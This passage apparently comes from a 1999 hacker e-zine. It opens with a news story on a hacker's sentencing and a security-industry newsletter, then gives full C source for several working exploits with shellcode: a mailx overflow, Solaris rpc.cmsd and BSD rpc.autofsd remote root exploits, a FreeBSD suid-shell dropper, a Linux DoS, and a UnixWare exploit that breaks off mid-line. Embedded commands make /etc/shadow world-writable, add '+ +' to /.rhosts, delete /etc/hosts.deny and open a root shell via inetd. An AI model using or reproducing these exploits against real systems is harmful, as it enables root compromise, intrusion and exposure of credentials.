And under a judge's orders last week, he won't be allowed to touch a computer for three years after his release.

Burns was initially indicted May 13 on charges of breaking into computers for the U.S. Information Agency and two businesses. That was four days after the White House Internet site - at www.whitehouse.gov - was electronically assaulted.

Initially, Burns said he wasn't directly involved in that White House attack in which the altered site included the phrase, "following peeps get some shouts" - hacker slang for "hello" - and listed a dozen names, including Zyklon. Zyklon is the name of a poison gas used by Nazis against Jews.

But federal prosecutors said Burns boasted of the White House attack online even before it happened, and Burns admitted at his sentencing Friday he was among three people who altered the site briefly to show a black Web page with the names of hacker organizations, along with messages, "Your box was own3d," and, "Stop all the war."

He said Monday in a telephone interview from his home in Shorewood, Wash., that he will refuse to identify his two partners to the Secret Service, partly because he believes the criminal penalties for hackers are too steep. His punishment didn't fit his crime, he insisted.

"I'd rather not have what happened to me happen to anyone else," Burns said. "I don't really agree with the kind of sentencing range there is for the crime."

The seriousness of the trouble facing Burns didn't sink in, he admitted, even after FBI agents raided his home and took his computer.

"I just gave them a confession," Burns said. "I didn't think it was too big a deal."

Prosecutors indicated otherwise. U.S. Attorney Helen Fahey said Burns attacked computers on the Internet controlling Web sites for NATO, a U.S. embassy and consulates and even Vice President Al Gore. The USIA Web site was shut down for eight days after Burns' attack. All told, the attacks cost the government and businesses more than $40,000, prosecutors said.
When the White House site was vandalized, experts "had to shut down the Web server, disconnect both the public and private computer networks from the Internet for two days and reconfigure the computer system," Fahey said in a statement.

Burns expects to report to federal prison in four to six weeks, which he hopes will let him spend Thanksgiving and the holidays with his family. With time off for good behavior, his lawyer told him he might spend as few as 13 months behind bars.

Although his sentence says he won't be allowed to use a computer during three years of supervised probation when he's released, he's already planning to ask his probation officer whether he'll be allowed to use one for work.

"I really don't know" how the arrest and time in prison will affect his future, Burns said. "Hopefully, it won't impact it too bad."

==
Some day, on the corporate balance sheet, there will be an entry which reads, "Information"; for in most cases the information is more valuable than the hardware which processes it.
-- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/

@HWA

37.0 [ISN] Security Wire Digest Volume 1
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: infosecurity@emailch.com

SECURITY WIRE DIGEST, VOL. 1, NO. 8, NOV. 22, 1999

Security Wire Digest is a weekly e-mail newsletter brought to you by Information Security magazine, an ICSA.net publication. TO UNSUBSCRIBE, REFER TO THE INSTRUCTIONS AT THE END OF THIS MESSAGE.

=====================================================
CONTENTS

**THANKSGIVING NOTICE**

1. INFOSEC WEEK IN REVIEW
*Enterprise Security Management a Hot Topic at CSI

2. INDUSTRY BRIEFS
*HP VirtualVault 4.0 Goes Mainstream
*eNABLE Supports Rainbow and RSA
*Celo Debuts CeloCom VPN Suite
*RSA Joins Trusted Computing Platform Alliance
*Entegrity Partners With Identrus
*Schlumberger Introduces Easyflex Corporate
*Identix BioLogon Available Online
*Tumbleweed Acquires Worldtalk

3. HAPPENINGS

4. SECURITY PERSPECTIVES
*Exposing Hacking With Hacking Exposed
By Ben Rothke

=====================================================
THIS ISSUE OF SECURITY WIRE DIGEST IS SPONSORED BY...

Agilent Technology SFProtect NT Security Scanner

SFProtect NT Security Scanner is the ONE software solution that empowers you to find and fix NT vulnerabilities with one single application. How? SFProtect scans the NT operating system, IIS and SQL version 6.5 and 7.0 for security vulnerabilities. Once identified, problems can be fixed with SFProtect's unique Intellifix feature. You can also get e-mail notification of audit results, reports in HTML, remote operation through a secure ODBC link and more. Download your free trial version today:
http://www.agilent.com/comms/netsecurity9

=====================================================
**THANKSGIVING NOTICE**

Security Wire Digest will take a one-issue hiatus next week due to U.S. Thanksgiving festivities. The next Security Wire Digest will be delivered on Monday, Dec. 6.

=====================================================
1. INFOSEC WEEK IN REVIEW

*ENTERPRISE SECURITY ADMINISTRATION A HOT TOPIC AT CSI

Easing the burdens of security administration is on the minds of lots of security practitioners these days. As organizations introduce new technologies and services to network infrastructures, security admins and managers are faced with the complex task of not only finding and fixing new vulnerabilities before they are exploited, but identifying and responding to breaches after they've already occurred. Last week at CSI's annual security conference, a number of vendors introduced new tools and enhancements to existing products that respond to this need by automating, centralizing and simplifying the task of enterprise risk management and intrusion response.

BindView Development Corp.
(http://www.bindview.corp) announced version 2.0 of its HackerShield software, an enterprise vulnerability scanner that allows operators to find and close security holes in servers, workstations and network devices across a heterogeneous network. Available in December, version 2.0 is engineered with the increasing number of security newbies in mind; while its database of vulnerability scripts is as extensive as that of other enterprise-class scanners, the tool deploys fast and is easy to configure and use. It includes a handy Scan Wizard that walks new users through the first-time scanning process, and when a vulnerability or breach is identified, it uses plain language to spell out the degree of risk and appropriate response procedures.

BMC Software (http://www.bmc.com) rolled out an enhancement to its CONTROL-SA security suite that extends the reach of its centralized management offering. CONTROL-SA/Links allows admins and managers to create event definitions and automated rulesets for disparate parts of the enterprise network. For instance, security managers can integrate human resource applications within the security administration process. If a new employee joins the organization, CONTROL-SA/Links can be directed to intercept certain HR transactions and automatically initiate end-user rights for the new employee.

By year-end, newcomer e-Security (http://www.esecurityinc.com) plans to introduce a "Management Desk" to its Open e-Security Platform (OeSP) to help operators respond to identified security breaches. OeSP's competitive differentiator is that it consolidates reports of security "exceptions" in real-time from fragmented security products -- no matter the product brand. When the central console receives notice of an intrusion, the Management Desk will automatically generate a step-by-step response outline according to the organization's predefined security policy, contact appropriate personnel and monitor security response procedures.
Version 5.5 of Network Associates's (http://www.nai.com) CyberCop vulnerability scanner also automates several administrative tasks. Its AutoFix feature automatically repairs more than 700 identified network, protocol and application vulnerabilities, and its AutoUpdate feature lets admins update the scanning engine and vulnerability database on a regular, automatic basis.

Computer Associates (http://www.cai.com) announced an access control enhancement to its eTrust family of security tools. With the simultaneous release of eTrust Access Control 5.0 for UNIX and eTrust Access Control 4.1 for NT, CA provides users with a centralized system for creating, distributing and managing access. The tools also operate within CA's flagship enterprise management system, Unicenter TNG.

Finally, BullSoft (http://www.bullsoft.com) announced that it has integrated storage management capabilities into its OpenMaster secure e-infrastructure and enterprise management software. The added capability allows organizations to select and configure best-of-breed Internet and enterprise-wide storage resources, and manage all of them from a centralized OpenMaster console. OpenMaster storage management configuration starts at $18,900, which includes core services such as network monitoring, alarm management and network discovery.

=====================================================
2. INDUSTRY BRIEFS

*HP VIRTUALVAULT 4.0 GOES MAINSTREAM

Hewlett-Packard last week announced major enhancements and new pricing to its Praesidium VirtualVault 4.0 trusted Web-server platform. The latest version of VirtualVault provides application-level protection for such b-to-b applications as SAP, Oracle and Ariba; and supports a broader range of enterprise server platforms, including Sun, Microsoft, Compaq and IBM. Optional BMC Software Patrol SafePassage for VirtualVault simplifies the deployment of secure extranets. Entry-level price for VirtualVault is now $17,500.
http://www.hp.com/security

*eNABLE SUPPORTS RAINBOW AND RSA

eNABLE Solutions and Rainbow Technologies will develop an integrated solution that combines enRole, eNABLE's e-business access management system, with iKey, Rainbow's USB authentication device, providing end-users with two-factor hardware authentication in a scalable solution. In related news, eNABLE announced that it has enhanced enRole to provide support for RSA ACE/Server authentication management software from RSA Security.
http://www.enablesolutions.com
http://www.rainbow.com
http://www.rsasecurity.com

*CELO DEBUTS CELOCOM VPN SUITE

Fully integrated with Celo Communications's PKI technology, the CeloCom VPN suite offers authentication, encryption and full X.509 and LDAP compliance. The suite can be integrated into existing networks and can interoperate with other VPN products, certificate management systems, smart cards and readers, and LDAP directory services. The suite is comprised of four CeloCom products: CeloCom Secure remote access, CeloCom RVPN and CeloCom LVPN remote VPN clients, and CeloCom GateKeeper remote access server.
http://www.celocom.com

*RSA JOINS TRUSTED COMPUTING PLATFORM ALLIANCE

RSA Security Inc. joined the Trusted Computing Platform Alliance (TCPA), an industry group whose goal is to establish a new hardware and software specification that technology companies can use to offer more trusted and secure personal computers for conducting e-business. RSA Security will work alongside founding members Compaq, HP, IBM, Intel and Microsoft to simplify the RSA deployment, use and manageability of SecurID technologies by enhancing and standardizing security at the level of the platform hardware, BIOS and operating system.
http://www.rsasecurity.com

*ENTEGRITY PARTNERS WITH IDENTRUS

Secure e-business applications provider Entegrity Solutions has announced an agreement with the Identrus alliance to develop enterprise-ready solutions based on the Identrus trust model that meet Identrus specifications for global e-commerce interoperability and security. Using cryptography and PKI technology, Entegrity will work with Identrus-member financial institutions and solution providers to "trust-enable" standard, legacy and custom applications used for b-to-b e-commerce. Identrus members now represent 11 global financial institutions in more than 100 countries with more than 8 million business relationships.
http://www.entegrity.com
http://www.identrus.com

*SCHLUMBERGER INTRODUCES EASYFLEX CORPORATE

In order to meet the growing security concerns of the corporate market, Schlumberger has introduced Easyflex Corporate, a new dual-interface contact/contactless smart card that facilitates secure access to the real and virtual desktop. The card controls physical access to offices, buildings and parking lots through its contactless interface, as well as logical access to computers, servers and networks through its secure contact interface.
http://www.smartcards.com

*IDENTIX BIOLOGON AVAILABLE ONLINE

Biometric security provider Identix last week made its BioLogon network security fingerprint identification software and hardware available as a new product at Beyond.com's Web site. Visitors to Beyond.com can download the BioLogon fingerprint identification suite, and obtain biometric hardware readers in multiple options.
http://www.beyond.com
http://www.identix.com

*TUMBLEWEED ACQUIRES WORLDTALK

Secure messaging provider Tumbleweed Communications Corp. last week announced a definitive agreement to acquire Worldtalk Corp.
When combined with Worldtalk's WorldSecure e-mail content filtering products, Tumbleweed's Integrated Messaging Exchange (IME) will enable customers to centrally define and enforce policies that drive new traffic across IME. Worldtalk will become a wholly owned subsidiary of Tumbleweed. The transaction is expected to close in the first quarter of 2000. Terms were not released.
http://www.tumbleweed.com
http://www.worldtalk.com

=====================================================
3. HAPPENINGS

Cards on the 'Net -- Smart Cards and ID Technology: Unlocking the Commercial Potential of the Web
Tu-Th, Nov. 30-Dec. 2, San Francisco, Calif.
http://www.ctst.com

DECEMBER

IT Solutions & Information Assurance Conference
W, Dec. 1, Los Angeles, Calif.
W & Th, Dec. 8 & 9, Colorado Springs, Colo.
http://www.technologyforums.com

18th Annual Data Center Conference: Taking the Data Center to E-business and Beyond
W-F, Dec. 1-3, Orlando, Fla.
http://www.gartner.com

15th Annual Computer Security Applications Conference
M-F, Dec. 6-10, Phoenix, Ariz.
http://www.acsac.org

Web and Intranet Security
T-Th, Dec. 7-9 Orlando, Fla.
http://www.misti.com

SANS Security San Francisco
S-Th, Dec. 11-16, San Francisco, Calif.
http://www.sans.org/sf99/sf99.htm

Extranet Security
M-W, Dec. 13-15 San Francisco, Calif.
http://www.unex.berkeley.edu/eng

=====================================================
4. SECURITY PERSPECTIVES

*EXPOSING HACKING WITH HACKING EXPOSED
By Ben Rothke

Do books about hacking create more hackers? Is corporate America at risk due to such titles? Many people in the computer industry feel that such dissemination of information is a sure way to increase computer malevolence. The question has been re-ignited with the publication of Hacking Exposed: Network Security Secrets and Solutions, by Stuart McClure, Joel Scambray and George Kurtz, all formerly with Ernst & Young's e-security group.
Are such titles simply cookbooks for those attempting to perform computer crimes? The knee-jerk answer might be yes, but in reality, the answer is a clear no. As an example, will the reader of Adventures in the Kitchen by Wolfgang Puck emerge as a gourmet chef, or will the reader of Dr. Atkins's New Diet Revolution lose weight by reading the book? While the written word is powerful, and Hacking Exposed is indeed a powerful book, there is no way for a book to instantaneously turn a novice into a dangerous hacker.

While a preponderance of corporate systems are indeed insecure, it is irresponsible and capricious to think that the mere appearance of a book such as Hacking Exposed will create a landslide of hacker activity. Such an allegation is simply an attempt to transfer corporate America's apathy towards information security, and apply a quick blame to a much larger problem.

Anyone who views hacking as an exercise in reading a book does not understand hacking, nor the nature of securing computer systems. True, the book lists tools and exercises that will make a hacking exercise easier. But to perform a real hack is something that takes more than the book has to offer. The authors state something to the effect of, "hacking root is a state of mind." With such a mantra, the true hacker will know that running a few handy tools or scripts will only provide them with a start to their hacking endeavor. When the tools fail, where will they go on? If not their own fortitude, their own quest for root, a quest that can not be found in any book, then the hacking attempt will quickly end there.

Want to know a secret? Contrary to the movies and CNN reports, hacking is a pretty boring exercise. Just as a novice hunter will tire after a short while, so too will a script kiddie wear down easily. For the novice hacker, the appearance of a book about hacking will neither help nor hinder his aspirations.
Traversing through networks, servers and myriad hosts is tedious at best for the greenhorn. It is only the media and uninitiated who attempt to glamorize such activities.

Hacking Exposed is an important title for those who are interested in securing their systems, and know what the innumerable vulnerabilities within their systems are. Will such a title unleash a new wave of hackers? No.

Ben Rothke (brothke@ebnetworks.com) is a network security consultant with eB Networks Inc.

=====================================================
ADVERTISEMENT

ICSA.net announces a free Webcast, "An Overview of Intrusion Detection Technologies," to air on Dec. 9, 1999. This one-hour seminar will explain intrusion detection and vulnerability assessment in clear terms, as well as announce the new ICSA Intrusion Detection Buyers' Guide, an online resource for decision-makers. For details, visit http://www.icsa.net.

=====================================================
Security Wire Digest and Information Security magazine are published by ICSA.net, the world's leader in Internet Security services. Copyright (c) 1999. All rights reserved. No portion of this newsletter may be redistributed or republished in any format without the express consent of the publisher.

=====================================================
To SUBSCRIBE to Security Wire Digest, go to:
http://www.infosecuritymag.com/newsletter

To UNSUBSCRIBE to Security Wire Digest, go to:
http://custserv.emailch.com/removeme/unsub.cfm?j=11887&e=jericho@dimensional.com

To CHANGE your e-mail address, go to:
http://polaris.emailch.com/infosecurity/questionnaire.cfm?e=jericho@dimensional.com

.. email integration by EmailChannel, Inc. For more information, send email to info@emailch.com or please visit http://www.emailch.com

@HWA

38.0 mailx.c slackware 3.6 local exploit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* I dunno if this is an old overflow or (it probably is...)
   but I was just messing with the Slackware 3.6 source and found it.

   Here's some basic notes on what happens:

   $HOME environment dir contains exploit.
   Exploit buffer size = 1024 + 8

   tinit() is called first. This gets the homedir variable from cp which
   is a value returned by getenv("HOME");

   load() is called next, taking as an argument an expanded "~/.mailrc".

   expand():

   if (name[0] == '~' && (name[1] == '/' || name[1] == '\0')) {
           sprintf(xname, "%s%s", homedir, name + 1);

   xname size = 1024
   homedir == getenv("HOME")
   name == "~/.mailrc"

   "~/.mailrc" is at end of the buffer, so this should just be pushed
   over the stack and forgotten about.
*/

/*
 * mailx buffer overflow
 *
 */

#include
#include

#define BSIZE   (1024)
#define OSIZE   (8)
#define ESIZE   (BSIZE + OSIZE)
#define NOP     (0x90)
#define OFFSET  (0)

char hellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

long get_esp (void)
{
    __asm__ ("movl %esp, %eax");
}

int main (int argc, char * * argv)
{
    char * evil;
    int i, j;
    long addr;
    int offset = OFFSET;

    evil = (char *)malloc(ESIZE);

    for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
        evil[i] = NOP;

    for (j = 0; i < (ESIZE - 4); ++i, ++j)
        evil[i] = hellcode[j];

    if (argc > 1)
        offset = atoi(argv[1]);

    addr = (get_esp() -  offset);

    *(long *)(evil + i) = addr;

    setenv("HOME", evil, 1);

    fprintf(stderr, "\nmailx-8.1.1 exploit\n");
    fprintf(stderr, "Using address 0x%x, offset %d\n\n", addr, offset);

    execl("/usr/bin/mail", "mail", NULL);
}

/* www.hack.co.za */

@HWA

39.0 cmsdex.c Solaris (2.6 / 7.0) remote exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * cmsdex - i386 Solaris remote root exploit for /usr/dt/bin/rpc.cmsd * * Tested and confirmed under Solaris 2.6 and 7.0 (i386) * * Usage: % cmsdex -h hostname -c command -s sp -o offset * * where hostname is the hostname of the machine running the vulnerable * CDE calendar service, command is the command to run as root on the * vulnerable machine, sp is the %esp stack pointer value, and offset * is the number of bytes to add to sp to calculate your target %eip * (try -1000 to 1000 in increments of 10 or so for starters once you * have a good guess at the stack pointer). * * When specifying a command, be sure to pass it to the exploit as a * single argument, namely enclose the command string in quotes if it * contains spaces or other special shell delimiter characters. The * command string must not be longer than 100 bytes. The exploit will * pass this string without modification to /bin/sh -c on the remote * machine, so any normally allowed Bourne shell syntax is also allowed * in the command string. Due to the nature of the exploit, the command * string must not contain any @ characters. 
 *
 * Demonstration values for i386 Solaris:
 *
 * (2.6) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x0804748c -o 0
 * (7.0) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x08047378 -o 0
 *
 * June 4, 1999
 */

#include
#include
#include
#include
#include

#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21

#define EGGLEN 1036
#define JUGULAR 1024
#define NOP 0x90

char shell[] =
/*  0 */ "\xeb\x3d"                         /* jmp springboard */
/* syscall: */
/*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0 */
/*  9 */ "\xc3"                             /* ret */
/* start: */
/* 10 */ "\x5e"                             /* popl %esi */
/* 11 */ "\x31\xc0"                         /* xor %eax,%eax */
/* 13 */ "\x89\x46\xbf"                     /* movl %eax,-0x41(%esi) */
/* 16 */ "\x88\x46\xc4"                     /* movb %al,-0x3c(%esi) */
/* 19 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi) */
/* 22 */ "\x88\x46\x17"                     /* movb %al,0x17(%esi) */
/* 25 */ "\x88\x46\x1a"                     /* movb %al,0x1a(%esi) */
/* 28 */ "\x88\x46\xff"                     /* movb %al,0x??(%esi) */
/* execve: */
/* 31 */ "\x31\xc0"                         /* xor %eax,%eax */
/* 33 */ "\x50"                             /* pushl %eax */
/* 34 */ "\x56"                             /* pushl %esi */
/* 35 */ "\x8d\x5e\x10"                     /* leal 0x10(%esi),%ebx */
/* 38 */ "\x89\x1e"                         /* movl %ebx,(%esi) */
/* 40 */ "\x53"                             /* pushl %ebx */
/* 41 */ "\x8d\x5e\x18"                     /* leal 0x18(%esi),%ebx */
/* 44 */ "\x89\x5e\x04"                     /* movl %ebx,0x4(%esi) */
/* 47 */ "\x8d\x5e\x1b"                     /* leal 0x1b(%esi),%ebx */
/* 50 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi) */
/* 53 */ "\xb0\x3b"                         /* movb $0x3b,%al */
/* 55 */ "\xe8\xc6\xff\xff\xff"             /* call syscall */
/* 60 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp */
/* springboard: */
/* 63 */ "\xe8\xc6\xff\xff\xff"             /* call start */
/* data: */
/* 68 */ "\xff\xff\xff\xff"                 /* DATA */
/* 72 */ "\xff\xff\xff\xff"                 /* DATA */
/* 76 */ "\xff\xff\xff\xff"                 /* DATA */
/* 80 */ "\xff\xff\xff\xff"                 /* DATA */
/* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */
/* 92 */ "\x2d\x63\xff";                    /* DATA */

extern char *optarg;

struct cm_send {
    char *s1;
    char *s2;
};

struct cm_reply {
    int i;
};

bool_t
xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
    if (!xdr_wrapstring(xdrs, &objp->s1))
        return (FALSE);
    if (!xdr_wrapstring(xdrs, &objp->s2))
        return (FALSE);
    return (TRUE);
}

bool_t
xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
    if (!xdr_int(xdrs, &objp->i))
        return (FALSE);
    return (TRUE);
}

int
main(int argc, char *argv[])
{
    int c, slen, clen;
    char *program, *hostname, *command, egg[EGGLEN+1], *eggp;
    unsigned long int sp = 0, addr, alen = 16;
    long int offset = 0;
    CLIENT *cl;
    struct cm_send send;
    struct cm_reply reply;
    struct timeval tm = { 10, 0 };
    enum clnt_stat stat;

    program = argv[0];
    hostname = "localhost";
    command = "chmod 666 /etc/shadow";

    while ((c = getopt(argc, argv, "h:c:s:o:a:")) != EOF) {
        switch (c) {
        case 'h':
            hostname = optarg;
            break;
        case 'c':
            command = optarg;
            break;
        case 's':
            sp = strtoul(optarg, NULL, 0);
            break;
        case 'o':
            offset = strtol(optarg, NULL, 0);
            break;
        case 'a':
            alen = strtoul(optarg, NULL, 0);
            break;
        case '?':
        default:
            printf("usage: %s -h hostname -c command -s sp -o offset\n", program);
            exit(1);
            break;
        }
    }

    slen = strlen(shell);
    clen = strlen(command);

    if (clen > 100) {
        printf("exploit failed; command string too long "
               "(must not exceed 100 characters)\n");
        exit(1);
    }

    shell[30] = (char) (clen + 27);

    memset(egg, NOP, EGGLEN);

    eggp = egg + EGGLEN - alen - 1 - clen - slen;
    memcpy(eggp, shell, slen);
    eggp += slen;
    memcpy(eggp, command, clen);
    eggp += clen;
    *eggp++ = '\xff';

    addr = sp + offset;

    while (eggp <= egg + EGGLEN - 4) {
        *eggp++ = (addr >> 0) & 0xff;
        *eggp++ = (addr >> 8) & 0xff;
        *eggp++ = (addr >> 16) & 0xff;
        *eggp++ = (addr >> 24) & 0xff;
    }

    egg[JUGULAR] = '\xff';
    egg[EGGLEN] = '\0';

    send.s1 = egg;
    send.s2 = "";

    cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp");
    if (cl == NULL) {
        clnt_pcreateerror("clnt_create");
        printf("exploit failed; unable to contact RPC server\n");
        exit(1);
    }

    cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);

    stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send,
                     xdr_cm_reply, (caddr_t) &reply, tm);

    if (stat == RPC_SUCCESS) {
        printf("exploit failed; RPC succeeded and returned %d\n", reply.i);
        clnt_destroy(cl);
        exit(1);
    } else {
        clnt_perror(cl, "clnt_call");
        printf("exploit probably worked; RPC failure was expected\n");
        clnt_destroy(cl);
        exit(0);
    }
}
/* www.hack.co.za */

@HWA

40.0 xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * xsoldier exploit for Freebsd-3.3-RELEASE
 * Drops a suid root shell in /bin/sh
 * Brock Tellier btellier@usa.net
 */

#include

char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";

#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"

void buildui()
{
    FILE *fp;
    char cc[100];

    fp = fopen("/tmp/ui.c", "w");
    fprintf(fp, CODE);
    fclose(fp);

    snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
    system(cc);
}

main (int argc, char *argv[] )
{
    int x = 0;
    int y = 0;
    int offset = 0;
    int bsize = 4400;
    char buf[bsize];
    int eip = 0xbfbfdb65; /* works for me */

    buildui();

    if (argv[1]) {
        offset = atoi(argv[1]);
        eip = eip + offset;
    }

    fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE \n");
    fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
    fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);

    for ( x = 0; x < 4325; x++) buf[x] = 0x90;
    fprintf(stderr, "NOPs to %d\n", x);

    for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
    fprintf(stderr, "Shellcode to %d\n",x);

    buf[x++] = eip & 0x000000ff;
    buf[x++] = (eip & 0x0000ff00) >> 8;
    buf[x++] = (eip & 0x00ff0000) >> 16;
    buf[x++] = (eip & 0xff000000) >> 24;
    fprintf(stderr, "eip to %d\n",x);

    buf[bsize]='\0';

    execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
}
/* www.hack.co.za */

@HWA

41.0 rpc.autofsd.c FreeBSD/misc remote exploit by guidob.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

// *** Synnergy Networks
// * Description:
//
// Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
// on tcp port 530.
// * Author:
//
// guidob (guidob@synnergy.net)
// Synnergy Networks (c) 1999, http://www.synnergy.net
// * Greets:
//
// Synnergy Networks, LoU, Cindy
// * Comments:
//
// This will not work on all types and/or versions.
// *** Synnergy Networks

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)
#define AT 8
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024

struct mntrequest {
    char *name;    /* name to be looked up */
    char *map;     /* map to use */
    char *opts;    /* default options */
    char *path;    /* mountpoint to use */
};

struct mntres {
    int status;    /* 0=OK, otherwise an errno from */
};

bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
    if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
    if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
    if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
    if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
    return (TRUE);
}

void signal_handler(void)
{
    exit(0);
}

bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
    if (!xdr_int(xdrs, &objp->status)) return (FALSE);
    return (TRUE);
}

main(int argc, char **argv){
    CLIENT *cl;
    struct mntrequest mntreq;
    struct mntres *res;
    struct sockaddr_in target;
    struct hostent *hp;
    struct timeval tm;
    char *host;
    enum clnt_stat stat;
    int sd;

    signal(SIGALRM, signal_handler);
    alarm(AT);

    host=argv[1];
    if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
        if ((hp = gethostbyname(host)) == NULL) {
            printf("%s: cannot resolve\n", host);
            exit(1);
        } else
            target.sin_addr.s_addr = *(u_long *)hp->h_addr;
    }
    target.sin_family=AF_INET;
    target.sin_port=0;
    sd=RPC_ANYSOCK;
    tm.tv_sec=8;
    tm.tv_usec=0;

    if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) {
        clnt_pcreateerror("clnt_create");
        exit(0);
    }

    cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
    tm.tv_sec = 25;

    /* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob */
    mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* You can put whatever you like here */
    mntreq.map="/bin/true";
    mntreq.path="/hosts";
    mntreq.opts="";

    bzero((char *)&res, sizeof(res));

    if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
                          (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
        clnt_perror(cl, "clnt_call");
        exit(1);
    }
    clnt_destroy(cl);
}
// EOF

@HWA

42.0 iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
   Exploit option length missing checks in:

   Debian Linux 2.1
   RedHat Linux 5.2
   Linux kernel 2.0.38
   Linux kernel 2.0.37
   Linux kernel 2.0.36
   Linux kernel 2.0.35
   Linux kernel 2.0

   Andrea Arcangeli
 */

#include
#include
#include
#include

main()
{
    int sk;
    struct sockaddr_in sin;
    struct hostent * hostent;
#define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
#define OPT_SIZE 1
    char payload[PAYLOAD_SIZE];

    sk = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk < 0)
        perror("socket"), exit(1);

    if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
        perror("setsockopt"), exit(1);

    bzero((char *)&sin, sizeof(sin));
    sin.sin_port = htons(0);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(2130706433);

    if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
        perror("connect"), exit(1);

    if (write(sk, payload, PAYLOAD_SIZE) < 0)
        perror("write"), exit(1);
}
/* www.hack.co.za */

@HWA

43.0 truck.c UnixWare 7.1 local exploit by Brock Tellier.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/**
 ** "Its a hole you could drive a truck through."
 **                           -Aleph One
 **
 ** truck.c UnixWare 7.1 security model exploit
 ** Demonstrates how we own privileged processes
 **
 ** Usage: cc -o truck truck.c
 **        ./truck where filetype is 1, 2 or 3
 **        (for dacread, dacwrite and setuid, respectively)
 **
 ** This will put $XNEC in the environment and run a shell.
 ** From there you must use gdb/debug to load a file of the
 ** type you chose (by checking /etc/security/tcb/privs)
 ** and setting a breakpoint at _init via "break _init".
 ** When you "run" and break at _init, change your EIP
 ** to something between 0x8046000 and 0x8048000 with
 ** "set $eip = 0x8046b75" and "continue" twice.
 **
 **
 ** Brock Tellier btellier@usa.net
 **/

#include
#include

char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define LEN 3500
#define NOP 0x90
#define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \
